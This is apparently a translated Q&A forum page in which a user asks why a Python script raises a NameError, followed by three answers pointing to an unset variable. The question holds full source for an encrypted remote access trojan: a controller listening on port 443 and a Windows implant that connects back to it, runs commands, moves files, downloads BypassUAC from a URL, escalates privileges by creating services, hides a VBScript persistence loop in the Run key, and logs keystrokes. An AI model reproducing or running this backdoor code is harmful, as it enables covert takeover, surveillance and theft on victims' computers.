Python脚本名称未定义

时间:2014-08-28 14:55:41

标签: python shell remote-access remote-debugging remote-server

我是Python的新手。我正在关注simple Python tutorial,但没有得到预期的结果。

在客户端上运行已编译的可执行文件后,客户端将显示在我的服务器上。但是,当我选择客户端编号(1)时,会立即退出python脚本,并且在远程Linux服务器上运行时会出现以下错误:


Activating client: ('172.51.8.204', 18268)

Traceback (most recent call last):
  File "xmulti_aeserver.py", line 207, in <module>
    if nextcmd.startswith("download ") == True:
NameError: name 'nextcmd' is not defined

在Windows服务器上本地运行时,脚本不会退出,但服务器会断开客户端的连接:

Activating client: ('192.168.1.104', 26042)

Client disconnected... ('192.168.1.104', 26042)

我到处都在阅读有关名称错误的内容,而且我无法看到我正在使用的代码有任何问题。

这是我的服务器代码(xmulti_aeserver.py):

#!/usr/bin/env python

from Crypto.Cipher import AES
import socket, base64, os, time, sys, select
from Crypto import Random

# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32

# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(s))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e))

# generate a random secret key
secret = "HUISA78sa9y&9syYSsJhsjkdjklfs9aR"
iv = Random.new().read(16)

# clear function
##################################
# Windows ---------------> cls
# Linux   ---------------> clear
if os.name == 'posix': clf = 'clear'
if os.name == 'nt': clf = 'cls'
clear = lambda: os.system(clf)

# initialize socket
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
c.bind(('0.0.0.0', 443))
c.listen(128)

# client information
active = False
clients = []
socks = []
interval = 0.8

# Functions
###########

# send data
def Send(sock, cmd, end="EOFEOFEOFEOFEOFX"):
    sock.sendall(EncodeAES(cipher, cmd + end))

# receive data
def Receive(sock, end="EOFEOFEOFEOFEOFX"):
    data = ""
    l = sock.recv(1024)
    while(l):
        decrypted = DecodeAES(cipher, l)
        data += decrypted
        if data.endswith(end) == True:
            break
        else:
            l = sock.recv(1024)
    return data[:-len(end)]

# download file
def download(sock, remote_filename, local_filename=None):
    # check if file exists
    if not local_filename:
        local_filename = remote_filename
    try:
        f = open(local_filename, 'wb')
    except IOError:
        print "Error opening file.\n"
        Send(sock, "cd .")
        return
    # start transfer
    Send(sock, "download "+remote_filename)
    print "Downloading: " + remote_filename + " > " + local_filename
    fileData = Receive(sock)
    f.write(fileData)
    time.sleep(interval)
    f.close()
    time.sleep(interval)

# upload file
def upload(sock, local_filename, remote_filename=None):
    # check if file exists
    if not remote_filename:
        remote_filename = local_filename
    try:
        g = open(local_filename, 'rb')
    except IOError:
        print "Error opening file.\n"
        Send(sock, "cd .")
        return
    # start transfer
    Send(sock, "upload "+remote_filename)
    print 'Uploading: ' + local_filename + " > " + remote_filename
    while True:
        fileData = g.read()
        if not fileData: break
        Send(sock, fileData, "")
    g.close()
    time.sleep(interval)
    Send(sock, "")
    time.sleep(interval)

# refresh clients
def refresh():
    clear()
    print '\nListening for clients...\n'
    if len(clients) > 0:
        for j in range(0,len(clients)):
            print '[' + str((j+1)) + '] Client: ' + clients[j] + '\n'
    else:
        print "...\n"
    # print exit option
    print "---\n"
    print "[0] Exit \n"
    print "\nPress Ctrl+C to interact with client."


# main loop
while True:
    refresh()
    # listen for clients
    try:
        # set timeout
        c.settimeout(10)

        # accept connection
        try:
            s,a = c.accept()
        except socket.timeout:
            continue

        # add socket
        if (s):
            s.settimeout(None)
            socks += [s]
            clients += [str(a)]

        # display clients
        refresh()

        # sleep
        time.sleep(interval)

    except KeyboardInterrupt:

        # display clients
        refresh()

        # accept selection --- int, 0/1-128
        activate = input("\nEnter option: ")

        # exit
        if activate == 0:
            print '\nExiting...\n'
            for j in range(0,len(socks)):
                socks[j].close()
            sys.exit()

        # subtract 1 (array starts at 0)
        activate -= 1

        # clear screen
        clear()

        # create a cipher object using the random secret
        cipher = AES.new(secret,AES.MODE_CFB, iv)
        print '\nActivating client: ' + clients[activate] + '\n'
        active = True
        Send(socks[activate], 'Activate')

    # interact with client
    while active:
        try:
            # receive data from client
            data = Receive(socks[activate])
        # disconnect client.
        except:
            print '\nClient disconnected... ' + clients[activate]
            # delete client
            socks[activate].close()
            time.sleep(0.8)
            socks.remove(socks[activate])
            clients.remove(clients[activate])
            refresh()
            active = False
            break

        # exit client session
        if data == 'quitted':
            # print message
            print "Exit.\n"
            # remove from arrays
            socks[activate].close()
            socks.remove(socks[activate])
            clients.remove(clients[activate])
            # sleep and refresh
            time.sleep(0.8)
            refresh()
            active = False
            break
        # if data exists
        elif data != '':
            # get next command
            sys.stdout.write(data)
            nextcmd = raw_input()

        # download
        if nextcmd.startswith("download ") == True:
            if len(nextcmd.split(' ')) > 2:
                download(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
            else:
                download(socks[activate], nextcmd.split(' ')[1])

        # upload
        elif nextcmd.startswith("upload ") == True:
            if len(nextcmd.split(' ')) > 2:
                upload(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
            else:
                upload(socks[activate], nextcmd.split(' ')[1])

        # normal command
        elif nextcmd != '':
            Send(socks[activate], nextcmd)

        elif nextcmd == '':
            print 'Think before you type. ;)\n'

这是我的客户端代码(xmulti_aeshell.py):

#!/usr/bin/python

from Crypto.Cipher import AES
import subprocess, socket, base64, time, os, sys, urllib2, pythoncom, pyHook, logging

# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32

# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(s))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e))

# generate a random secret key
secret = "HUISA78sa9y&9syYSsJhsjkdjklfs9aR"

# server config
HOST = '192.168.1.104'
PORT = 443

# session controller
active = False

# Functions
###########

# send data function
def Send(sock, cmd, end="EOFEOFEOFEOFEOFX"):
    sock.sendall(EncodeAES(cipher, cmd + end))

# receive data function
def Receive(sock, end="EOFEOFEOFEOFEOFX"):
    data = ""
    l = sock.recv(1024)
    while(l):
        decrypted = DecodeAES(cipher, l)
        data = data + decrypted
        if data.endswith(end) == True:
            break
        else:
            l = sock.recv(1024)
    return data[:-len(end)]

# prompt function
def Prompt(sock, promptmsg):
    Send(sock, promptmsg)
    answer = Receive(sock)
    return answer

# upload file
def Upload(sock, filename):
    bgtr = True
    # file transfer
    try:
        f = open(filename, 'rb')
        while 1:
            fileData = f.read()
            if fileData == '': break
            # begin sending file
            Send(sock, fileData, "")
        f.close()
    except:
        time.sleep(0.1)
    # let server know we're done..
    time.sleep(0.8)
    Send(sock, "")
    time.sleep(0.8)
    return "Finished download."

# download file
def Download(sock, filename):
    # file transfer
    g = open(filename, 'wb')
    # download file
    fileData = Receive(sock)
    time.sleep(0.8)
    g.write(fileData)
    g.close()
    # let server know we're done..
    return "Finished upload."

# download from url (unencrypted)
def Downhttp(sock, url):
    # get filename from url
    filename = url.split('/')[-1].split('#')[0].split('?')[0]
    g = open(filename, 'wb')
    # download file
    u = urllib2.urlopen(url)
    g.write(u.read())
    g.close()
    # let server know we're done...
    return "Finished download."

# privilege escalation
def Privs(sock):

    # Windows/NT Methods
    if os.name == 'nt':

        # get initial info
        privinfo = '\nUsername:        ' + Exec('echo %USERNAME%')
        privinfo += Exec('systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"')

        winversion = Exec('systeminfo')
        windowsnew = -1
        windowsold = -1

        # newer versions of windows go here
        windowsnew += winversion.find('Windows 7')
        windowsnew += winversion.find('Windows 8')
        windowsnew += winversion.find('Windows Vista')
        windowsnew += winversion.find('Windows VistaT')
        windowsnew += winversion.find('Windows Server 2008')

        # older versions go here (only XP)
        windowsold += winversion.find('Windows XP')
        windowsold += winversion.find('Server 2003')

        # if it is, display privs using whoami command.
        if windowsnew > 0:
            privinfo += Exec('whoami /priv') + '\n'

        # check if user is administrator
        admincheck = Exec('net localgroup administrators | find "%USERNAME%"')

        # if user is in the administrator group, attempt service priv. esc. using bypassuac
        if admincheck != '':

            privinfo += 'Administrator privilege detected.\n\n'

            # if windows version is vista or greater, bypassUAC :)
            if windowsnew > 0:

                # prompt for bypassuac location or url
                bypassuac = Prompt(sock, privinfo+'Enter location/url for BypassUAC: ')

                # attempt to download from url
                if bypassuac.startswith("http") == True:
                    try:
                        c = Downhttp(sock, bypassuac)
                        d = os.getcwd() + '\\' + bypassuac.split('/')[-1]
                    except:
                        return "Download failed: invalid url.\n"

                # attempt to open local file
                else:
                    try:
                        c = open(bypassuac)
                        c.close()
                        d = bypassuac
                    except:
                        return "Invalid location for BypassUAC.\n"


            # fetch executable's location
            curdir = os.path.join(sys.path[0], sys.argv[0])

            # add service
            if windowsnew > 0: elvpri = Exec(d + ' elevate /c sc create blah binPath= "cmd.exe /c ' + curdir + '" type= own start= auto')
            if windowsold > 0: elvpri = Exec('sc create blah binPath= "' + curdir + '" type= own start= auto')
            # start service
            if windowsnew > 0: elvpri = Exec(d + ' elevate /c sc start blah')
            if windowsold > 0: elvpri = Exec('sc start blah')
            # finished.
            return "\nPrivilege escalation complete.\n"

        # windows xp doesnt allow wmic commands by defautlt ;(
        if windowsold > 0:
            privinfo += 'Unable to escalate privileges.\n'
            return privinfo

        # attempt to search for weak permissions on applications
        privinfo += 'Searching for weak permissions...\n\n'

        # array for possible matches
        permatch = []
        permatch.append("BUILTIN\Users:(I)(F)")
        permatch.append("BUILTIN\Users:(F)")

        permbool = False

        # stage 1 outputs to text file: p1.txt
        xv = Exec('for /f "tokens=2 delims=\'=\'" %a in (\'wmic service list full^|find /i "pathname"^|find /i /v "system32"\') do @echo %a >> p1.txt')
        # stage 2 outputs to text file: p2.txt
        xv = Exec('for /f eol^=^"^ delims^=^" %a in (p1.txt) do cmd.exe /c icacls "%a" >> p2.txt')

        # give some time to execute commands,
        # 40 sec should do it... ;)
        time.sleep(40)

        # loop from hell to determine a match to permatch array.
        ap = 0
        bp = 0
        dp = open('p2.txt')
        lines = dp.readlines()
        for line in lines:
            cp = 0
            while cp < len(permatch):
                j = line.find(permatch[cp])
                if j != -1:
                    # we found a misconfigured directory :)
                    if permbool == False:
                        privinfo += 'The following directories have write access:\n\n'
                        permbool = True
                    bp = ap
                    while True:
                        if len(lines[bp].split('\\')) > 2:
                            while bp <= ap:
                                privinfo += lines[bp]
                                bp += 1
                            break
                        else:
                            bp -= 1
                cp += 1
            ap += 1
        time.sleep(4)
        if permbool == True: privinfo += '\nReplace executable with Python shell.\n'
        if permbool == False: privinfo += '\nNo directories with misconfigured premissions found.\n'
        # close file
        dp.close()
        # delete stages 1 & 2
        xv = Exec('del p1.txt')
        xv = Exec('del p2.txt')

        return privinfo

# persistence
def Persist(sock, redown=None, newdir=None):

    # Windows/NT Methods
    if os.name == 'nt':

        privscheck = Exec('reg query "HKU\S-1-5-19" | find "error"')

        # if user isn't system, return
        if privscheck != '':
            return "You must be authority\system to enable persistence.\n"
        # otherwise procede
        else:
            # fetch executable's location
            exedir = os.path.join(sys.path[0], sys.argv[0])
            exeown = exedir.split('\\')[-1]

            # get vbscript location
            vbsdir = os.getcwd() + '\\' + 'vbscript.vbs'

            # write VBS script
            if redown == None: vbscript = 'state = 1\nhidden = 0\nwshname = "' + exedir + '"\nvbsname = "' + vbsdir + '"\nWhile state = 1\nexist = ReportFileStatus(wshname)\nIf exist = True then\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(wshname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(vbsname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nSet WshShell = WScript.CreateObject ("WScript.Shell")\nSet colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")\nFor Each objProcess in colProcessList\nif objProcess.name = "' + exeown + '" then\nvFound = True\nEnd if\nNext\nIf vFound = True then\nwscript.sleep 50000\nElse\nWshShell.Run """' + exedir + '""",hidden\nwscript.sleep 50000\nEnd If\nvFound = False\nElse\nwscript.sleep 50000\nEnd If\nWend\nFunction ReportFileStatus(filespec)\nDim fso, msg\nSet fso = CreateObject("Scripting.FileSystemObject")\nIf (fso.FileExists(filespec)) Then\nmsg = True\nElse\nmsg = False\nEnd If\nReportFileStatus = msg\nEnd Function\n'
            else:
                if newdir == None: 
                    newdir = exedir
                    newexe = exeown
                else: 
                    newexe = newdir.split('\\')[-1]
                vbscript = 'state = 1\nhidden = 0\nwshname = "' + exedir + '"\nvbsname = "' + vbsdir + '"\nurlname = "' + redown + '"\ndirname = "' + newdir + '"\nWhile state = 1\nexist1 = ReportFileStatus(wshname)\nexist2 = ReportFileStatus(dirname)\nIf exist1 = False And exist2 = False then\ndownload urlname, dirname\nEnd If\nIf exist1 = True Or exist2 = True then\nif exist1 = True then\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(wshname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nexist2 = False\nend if\nif exist2 = True then\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(dirname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nend if\nset objFSO = CreateObject("Scripting.FileSystemObject")\nset objFile = objFSO.GetFile(vbsname)\nif objFile.Attributes AND 2 then\nelse\nobjFile.Attributes = objFile.Attributes + 2\nend if\nSet WshShell = WScript.CreateObject ("WScript.Shell")\nSet colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")\nFor Each objProcess in colProcessList\nif objProcess.name = "' + exeown + '" OR objProcess.name = "' + newexe + '" then\nvFound = True\nEnd if\nNext\nIf vFound = True then\nwscript.sleep 50000\nEnd If\nIf vFound = False then\nIf exist1 = True then\nWshShell.Run """' + exedir + '""",hidden\nEnd If\nIf exist2 = True then\nWshShell.Run """' + dirname + '""",hidden\nEnd If\nwscript.sleep 50000\nEnd If\nvFound = False\nEnd If\nWend\nFunction ReportFileStatus(filespec)\nDim fso, msg\nSet fso = CreateObject("Scripting.FileSystemObject")\nIf (fso.FileExists(filespec)) Then\nmsg = True\nElse\nmsg = False\nEnd If\nReportFileStatus = msg\nEnd Function\nfunction download(sFileURL, sLocation)\nSet objXMLHTTP = CreateObject("MSXML2.XMLHTTP")\nobjXMLHTTP.open "GET", sFileURL, false\nobjXMLHTTP.send()\ndo until objXMLHTTP.Status = 200 :  wscript.sleep(1000) :  loop\nIf objXMLHTTP.Status = 200 Then\nSet objADOStream = CreateObject("ADODB.Stream")\nobjADOStream.Open\nobjADOStream.Type = 1\nobjADOStream.Write objXMLHTTP.ResponseBody\nobjADOStream.Position = 0\nSet objFSO = Createobject("Scripting.FileSystemObject")\nIf objFSO.Fileexists(sLocation) Then objFSO.DeleteFile sLocation\nSet objFSO = Nothing\nobjADOStream.SaveToFile sLocation\nobjADOStream.Close\nSet objADOStream = Nothing\nEnd if\nSet objXMLHTTP = Nothing\nEnd function\n'

            # open file & write
            vbs = open('vbscript.vbs', 'wb')
            vbs.write(vbscript)
            vbs.close()

            # add registry to startup
            persist = Exec('reg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v blah /t REG_SZ /d "' + vbsdir + '"')
            persist += '\nPersistence complete.\n'
            return persist

# execute command
def Exec(cmde):
    # check if command exists
    if cmde:
        execproc = subprocess.Popen(cmde, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        cmdoutput = execproc.stdout.read() + execproc.stderr.read()
        return cmdoutput

    # otherwise, return
    else:
        return "Enter a command.\n"

# keylogging function
# version 1, by K.B. Carte
##########################
# enter log filename.
LOG_STATE = True
LOG_FILENAME = 'keylog.txt'
def OnKeyboardEvent(event):
    logging.basicConfig(filename=LOG_FILENAME,
                        level=logging.DEBUG,
                        format='%(message)s')
    logging.log(10,chr(event.Ascii))
    return True     

# main loop
while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))

        # create a cipher object using the random secret
        cipher = AES.new(secret,AES.MODE_CFB, iv)

        # waiting to be activated...
        data = Receive(s)

        # activate.
        if data == 'Activate':
            active = True
            Send(s, "\n"+os.getcwd()+">")

        # interactive loop
        while active:

            # Receive data
            data = Receive(s)

            # think before you type smartass
            if data == '':
                time.sleep(0.02)

            # check for quit
            if data == "quit" or data == "terminate":
                Send(s, "quitted")
                break

            # check for change directory
            elif data.startswith("cd ") == True:
                try:
                    os.chdir(data[3:])
                    stdoutput = ""
                except:
                    stdoutput = "Error opening directory.\n"

            # check for download
            elif data.startswith("download") == True:
                # Upload the file
                stdoutput = Upload(s, data[9:])

            elif data.startswith("downhttp") == True:
                # Download from url
                stdoutput = Downhttp(s, data[9:])

            # check for upload
            elif data.startswith("upload") == True:
                # Download the file
                stdoutput = Download(s, data[7:])

            elif data.startswith("privs") == True:
                # Attempt to elevate privs
                stdoutput = Privs(s)

            elif data.startswith("persist") == True:
                # Attempt persistence
                if len(data.split(' ')) == 1: stdoutput = Persist(s)
                elif len(data.split(' ')) == 2: stdoutput = Persist(s, data.split(' ')[1])
                elif len(data.split(' ')) == 3: stdoutput = Persist(s, data.split(' ')[1], data.split(' ')[2])

            elif data.startswith("keylog") == True:
                # Begin keylogging
                if LOG_STATE == False:
                    try:
                        # set to True
                        LOG_STATE = True
                        hm = pyHook.HookManager()
                        hm.KeyDown = OnKeyboardEvent
                        hm.HookKeyboard()
                        pythoncom.PumpMessages()
                        stdoutput = "Logging keystrokes to: "+LOG_FILENAME+"...\n"
                    except:
                        ctypes.windll.user32.PostQuitMessage(0)
                        # set to False
                        LOG_STATE = False
                        stdoutput = "Keystrokes have been logged to: "+LOG_FILENAME+".\n"


            else:
                # execute command.
                stdoutput = Exec(data)

            # send data
            stdoutput = stdoutput+"\n"+os.getcwd()+">"
            Send(s, stdoutput)

        # loop ends here

        if data == "terminate":
            break
        time.sleep(3)
    except socket.error:
        s.close()
        time.sleep(10)
        continue

我很感激任何指示。

3 个答案:

答案 0 :(得分:1)

您只在nextcmd声明的一个分支中定义if-else

 elif data != '':
    # get next command
    sys.stdout.write(data)
    nextcmd = raw_input()

但是假设它是在第207行定义的。您错过了data为空字符串的情况,这会阻止在您尝试访问它时定义nextcmd

答案 1 :(得分:1)

看起来你有

if data == 'quitted':
     ....
elif data != '':
     ....
     nextcmd = raw_input()

但如果data=='',则nextcmd未设置为任何内容,这会在您尝试使用时导致错误。

答案 2 :(得分:1)

xmulti_aeserver.py上方:

# main loop
while True:
  .....

nextcmd = ''。所以它将是:

nextcmd = ''
# main loop
while True:
  .....

这将定义nextcmd

添加到此IF声明:

elif data != '':
   # get next command
   sys.stdout.write(data)
   nextcmd = raw_input()    
elif data == '':
   nextcmd = raw_input()
else:
   nextcmd = raw_input()